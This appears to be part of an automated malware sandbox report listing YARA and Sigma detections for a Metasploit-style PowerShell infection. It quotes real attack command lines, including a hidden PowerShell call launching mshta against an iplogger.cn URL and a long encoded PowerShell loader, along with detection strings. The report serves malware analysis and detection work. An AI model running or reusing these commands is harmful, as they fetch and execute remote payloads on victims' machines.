00000003.00000002.2000051277.000001E1C1878000.00000004.00000800.00020000.00000000.sdmp	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x4b26e6:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x4b2bfe:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x4b2cc6:$s5: = [System.Convert]::FromBase64String( 0x4b295a:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x4b2b48:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
Process Memory Space: mshta.exe PID: 7472	WiltedTulip_WindowsTask	Detects hack tool used in Operation Wilted Tulip - Windows Tasks	Florian Roth	0x2fa9:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x6ee8:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x36e58:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x3b501:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x47137:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x4a6b8:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x4e0b4:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x4fed7:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x8627c:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x88090:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x89ed0:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x8f432:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x98868:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0xdb787:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0xdd52f:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
Process Memory Space: powershell.exe PID: 7540	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
Process Memory Space: powershell.exe PID: 7540	WiltedTulip_WindowsTask	Detects hack tool used in Operation Wilted Tulip - Windows Tasks	Florian Roth	0x228f5:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x246df:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x266ca:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x28bcc:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0xc6df1:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0xc8c72:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0xcaa5c:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x17c67c:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x1857e6:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x18775e:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x20aed7:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA 0x266488:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
Process Memory Space: powershell.exe PID: 7540	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x4873:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x5c34:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x7306:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x154a63:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x18a85f:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x1d72df:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x2261a6:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x263f7d:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x26511d:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x28ee85:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x2ae971:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x4e1b:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x61dc:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x78ae:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x15500b:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x18ae07:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x1d7887:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x2266bf:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x264525:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x2656c5:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x28f39d:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
Process Memory Space: powershell.exe PID: 7540	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x4f19:$b2: ::FromBase64String( 0x62da:$b2: ::FromBase64String( 0x79ac:$b2: ::FromBase64String( 0x337f9:$b2: ::FromBase64String( 0x155109:$b2: ::FromBase64String( 0x18af05:$b2: ::FromBase64String( 0x1d7985:$b2: ::FromBase64String( 0x226799:$b2: ::FromBase64String( 0x226e82:$b2: ::FromBase64String( 0x227c25:$b2: ::FromBase64String( 0x264623:$b2: ::FromBase64String( 0x2657c3:$b2: ::FromBase64String( 0x28f477:$b2: ::FromBase64String( 0x2aef63:$b2: ::FromBase64String( 0x50c6a:$s1: -join 0x5dd3f:$s1: -join 0x61111:$s1: -join 0x617c3:$s1: -join 0x632b4:$s1: -join 0x654ba:$s1: -join 0x65ce1:$s1: -join
Process Memory Space: powershell.exe PID: 7812	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
Process Memory Space: powershell.exe PID: 7812	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x3b52e:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x3cc17:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x3e302:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x3f9eb:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x410d6:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x427bf:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x43eaa:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x45593:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x46af1:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x3bad6:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x3d1bf:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x3e8aa:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x3ff93:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x4167e:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x42d67:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x44452:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x45b3b:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x47009:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x3bbc2:$s5: = [System.Convert]::FromBase64String( 0x3d2ab:$s5: = [System.Convert]::FromBase64String( 0x3e996:$s5: = [System.Convert]::FromBase64String(
Process Memory Space: powershell.exe PID: 7812	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x3bbd4:$b2: ::FromBase64String( 0x3d2bd:$b2: ::FromBase64String( 0x3e9a8:$b2: ::FromBase64String( 0x40091:$b2: ::FromBase64String( 0x4177c:$b2: ::FromBase64String( 0x42e65:$b2: ::FromBase64String( 0x44550:$b2: ::FromBase64String( 0x45c39:$b2: ::FromBase64String( 0x470e3:$b2: ::FromBase64String( 0x5f330:$s1: -join 0x96139:$s1: -join 0xa320e:$s1: -join 0xa65e0:$s1: -join 0xa6c92:$s1: -join 0xa8783:$s1: -join 0xaa989:$s1: -join 0xab1b0:$s1: -join 0xaba20:$s1: -join 0xac15b:$s1: -join 0xac18d:$s1: -join 0xac1d5:$s1: -join
Click to see the 30 entries

Other

Source	Rule	Description	Author	Strings
amsi64_7540.amsi.csv	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
amsi64_7540.amsi.csv	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0xc7a4:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xccc9:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0xcd96:$s5: = [System.Convert]::FromBase64String( 0xca1f:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0xcc12:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
amsi32_7812.amsi.csv	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
amsi32_7812.amsi.csv	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0xbc5f:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xc184:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0xc251:$s5: = [System.Convert]::FromBase64String( 0xbeda:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0xc0cd:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,

Sigma Signatures

System Summary

Sigma detected: MSHTA Suspicious Execution 01

Source: Process started

Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: "C:\Windows\system32\mshta.exe" https://iplogger.cn/forensicsas.png , CommandLine: "C:\Windows\system32\mshta.exe" https://iplogger.cn/forensicsas.png , CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'https://iplogger.cn/forensicsas.png'", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7288, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://iplogger.cn/forensicsas.png , ProcessId: 7472, ProcessName: mshta.exe

Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines

Source: Process started

Author: John Lambert (rule): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFcATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA3AHcALwBQAFUAcgBsADgAWQB4AEMAcwBqAHgALwBXAGEAQQBDAEoAcwBrAGEATAB2AEUASABrAHAAcQBkAGUAbwA3AE4AVgB1AGoARwBGADAALwBMAEQAZgBJAEoAdABUAGYAMQBPAFgATAB6AFEAQwBIAFMAdwB1AGYAdAB1AFcAYwBaAGEALwBCAEsAVABaAHcAaQBqAFUANQB0AEsAMwBDAGcAeABzAGoAdwBoADYAcABWAGYALwA2AHEAMQBwAC8AdQBtAGEAZQBiADQAUgBkAGEAdQBHAGsAVgBqAFgAeQBoAEsARAB0AGoAWQBOAHgAdABVADcAOQBxAEIAYwBHAHoAVAB4AEMAdABhAHIAaQAyAFgARwBZAGgAQwB0AHkATQAvAE8AQwA1AHUAMwBOAHAARQBTAHYAbAB1AEMAVgBJAC8AWgBxAC8AZQBTAFoARwAxAG4AZwB4ACsAZABPAEYAbABxAFAATQByAFUAcQBEAE0AZgBBAEQAWAB2AGsAcwBOAHEAZwBuAGcAcAA3AFQAOAAvAFAAMQBMAGMAMwBOAEgAbwBhAEUARwArAEwAYgBxAFMAQQBvAEQAaQBNAEQAQgBUAHYAUABSAHMAbABOADAATQByAGMARABEAFMAMABRAHIARQBxAGcAawBjAFkAZQBCAFcANgB3AEEAaQBSAGkAUwBOAEEAKwBxAE0AQgBlAFQAMgBvAFkAOQBxAGwAMABHAEsAYwBRAFAAMABQAHYAMgBwADMAdQBlAGEAaQByAEkAegB1AFgAOABxAFYASABzAHYAQgBMAHYARwBKAEsANAAzAFQAagBIAHgASgAzAFEAbwBaAGQAdwBjADEAWQBFADcAdgA2AEYALwBGADEAeAAxACsAUAAwAFcAWQBQAFgASwBqADgAbwBIAG8AZQBvAGcAagBGAHkATABvAEIAYwBDAC8ATAA2AEwAMQBjAHIARgB4AFYATQA1AFIATwBCAFAAYgBSAHcAbQBYAGkAbAAzAFIAOQBFAE4AUwBnAEUAUQBGAGcAbgBqAHYARABoAE8ATQAwADUAUgAvAGYAbgBuACsAUgB6AE4AbgBpAFcAVAB4AHEAZQBLAG0ATABQAFUAUwBlAFoANABQAEUAYwBjAGQAOQBUAFQATgBQAFMAYwA1ADgAcABGAHYAWABLAEsAbgBtAEwAKwBaAFoAbAA2ADIARQBGAHgAcwBmADUANQBOAHYAQgBvADUAUQBXAEkAegB3AE4AcgA2ADkAbgBuAGcASwA5ADkAZABHAFoAbwBoAFYASABKAHgAOAAxADUAbQB3AG8ANABhADkAWABUAEEAbgBMADQARQB6AHYAVgBnAHQAQwBuADMAOABXAEUAcgBVAGYAZQBaAFAAdABIAGMASwB3AE4ANQA1ADQAQQBLAGcAaQBKACsAcQA5AGcAagBtAGQAWQBxADAAcQBCAGcAcgBiAEEAMwAvAEUAZAB3AHYAUgB5AEIAVwBtAEcAegByAHQAUABxAFoAVwBmAHIAUgBmAHYAUgBTAHgAegAyAEUAcQBTAEIAagBWAE8ASQBjAC8AdABCAG0AVQBnAEMAeQBPAG4AUQBiAEYAQgA0AHAAMgBXADIASgBTAEUANQBiAEQANgBFADYANgBTAFkAdQBMAFoAVgBrAEwATwA2AHAANwByAEgAMQBCADYATQBzADIARgBBAFcAUgBNAGEAcwBQAHAAQQBnADIAbQBFAFMASABiAHMAMwBEAEIAUwBvAE0AYQBlAGcANwBxADUANABiAG4AbgBpAEYAVQBQACsAUwBFAHMAegBDAEcAbABBAE4ATgBlAHoAZwBUAG0AQwBtADQATQBFAGcAUgBNADcASABUACsAUABmADQAcQBOADgAWQBpAEUAagBiAEMASwBNAHQANwBDADYAcgBrAEkAZwB0AEYAMgByAE8ASwBhAFAASwBjAEwATgBjADUARgBUAC8AQQArAHgAegBuAGgAeQBUAG8AdQBEAHEAVABOAEkANwAwAEIAQQBBAEIAZwA1AEoAZwA1AHAANgBNAF

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://iplogger.cn/forensicsas.png , CommandLine: "C:\Windows\system32\mshta.exe" https://iplogger.cn/forensicsas.png , CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'https://iplogger.cn/forensicsas.png'", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7288, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://iplogger.cn/forensicsas.png , ProcessId: 7472, ProcessName: mshta.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFcATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA3AHcALwBQAFUAcgBsADgAWQB4AEMAcwBqAHgALwBXAGEAQQBDAEoAcwBrAGEATAB2AEUASABrAHAAcQBkAGUAbwA3AE4AVgB1AGoARwBGADAALwBMAEQAZgBJAEoAdABUAGYAMQBPAFgATAB6AFEAQwBIAFMAdwB1AGYAdAB1AFcAYwBaAGEALwBCAEsAVABaAHcAaQBqAFUANQB0AEsAMwBDAGcAeABzAGoAdwBoADYAcABWAGYALwA2AHEAMQBwAC8AdQBtAGEAZQBiADQAUgBkAGEAdQBHAGsAVgBqAFgAeQBoAEsARAB0AGoAWQBOAHgAdABVADcAOQBxAEIAYwBHAHoAVAB4AEMAdABhAHIAaQAyAFgARwBZAGgAQwB0AHkATQAvAE8AQwA1AHUAMwBOAHAARQBTAHYAbAB1AEMAVgBJAC8AWgBxAC8AZQBTAFoARwAxAG4AZwB4ACsAZABPAEYAbABxAFAATQByAFUAcQBEAE0AZgBBAEQAWAB2AGsAcwBOAHEAZwBuAGcAcAA3AFQAOAAvAFAAMQBMAGMAMwBOAEgAbwBhAEUARwArAEwAYgBxAFMAQQBvAEQAaQBNAEQAQgBUAHYAUABSAHMAbABOADAATQByAGMARABEAFMAMABRAHIARQBxAGcAawBjAFkAZQBCAFcANgB3AEEAaQBSAGkAUwBOAEEAKwBxAE0AQgBlAFQAMgBvAFkAOQBxAGwAMABHAEsAYwBRAFAAMABQAHYAMgBwADMAdQBlAGEAaQByAEkAegB1AFgAOABxAFYASABzAHYAQgBMAHYARwBKAEsANAAzAFQAagBIAHgASgAzAFEAbwBaAGQAdwBjADEAWQBFADcAdgA2AEYALwBGADEAeAAxACsAUAAwAFcAWQBQAFgASwBqADgAbwBIAG8AZQBvAGcAagBGAHkATABvAEIAYwBDAC8ATAA2AEwAMQBjAHIARgB4AFYATQA1AFIATwBCAFAAYgBSAHcAbQBYAGkAbAAzAFIAOQBFAE4AUwBnAEUAUQBGAGcAbgBqAHYARABoAE8ATQAwADUAUgAvAGYAbgBuACsAUgB6AE4AbgBpAFcAVAB4AHEAZQBLAG0ATABQAFUAUwBlAFoANABQAEUAYwBjAGQAOQBUAFQATgBQAFMAYwA1ADgAcABGAHYAWABLAEsAbgBtAEwAKwBaAFoAbAA2ADIARQBGAHgAcwBmADUANQBOAHYAQgBvADUAUQBXAEkAegB3AE4AcgA2ADkAbgBuAGcASwA5ADkAZABHAFoAbwBoAFYASABKAHgAOAAxADUAbQB3AG8ANABhADkAWABUAEEAbgBMADQARQB6AHYAVgBnAHQAQwBuADMAOABXAEUAcgBVAGYAZQBaAFAAdABIAGMASwB3AE4ANQA1ADQAQQBLAGcAaQBKACsAcQA5AGcAagBtAGQAWQBxADAAcQBCAGcAcgBiAEEAMwAvAEUAZAB3AHYAUgB5AEIAVwBtAEcAegByAHQAUABxAFoAVwBmAHIAUgBmAHYAUgBTAHgAegAyAEUAcQBTAEIAagBWAE8ASQBjAC8AdABCAG0AVQBnAEMAeQBPAG4AUQBiAEYAQgA0AHAAMgBXADIASgBTAEUANQBiAEQANgBFADYANgBTAFkAdQBMAFoAVgBrAEwATwA2AHAANwByAEgAMQBCADYATQBzADIARgBBAFcAUgBNAGEAcwBQAHAAQQBnADIAbQBFAFMASABiAHMAMwBEAEIAUwBvAE0AYQBlAGcANwBxADUANABiAG4AbgBpAEYAVQBQACsAUwBFAHMAegBDAEcAbABBAE4ATgBlAHoAZwBUAG0AQwBtADQATQBFAGcAUgBNADcASABUACsAUABmADQAcQBOADgAWQBpAEUAagBiAEMASwBNAHQANwBDADYAcgBrAEkAZwB0AEYAMgByAE8ASwBhAFAASwBjAEwATgBjADUARgBUAC8AQQArAHgAegBuAGgAeQBUAG8AdQBEAHEAVABOAEkANwAwAEIAQQBBAEIAZwA1AEoAZwA1AHAANgBNAF

Sigma detected: PowerShell Base64 Encoded IEX Cmdlet

Source: Process started

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFcATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA3AHcALwBQAFUAcgBsADgAWQB4AEMAcwBqAHgALwBXAGEAQQBDAEoAcwBrAGEATAB2AEUASABrAHAAcQBkAGUAbwA3AE4AVgB1AGoARwBGADAALwBMAEQAZgBJAEoAdABUAGYAMQBPAFgATAB6AFEAQwBIAFMAdwB1AGYAdAB1AFcAYwBaAGEALwBCAEsAVABaAHcAaQBq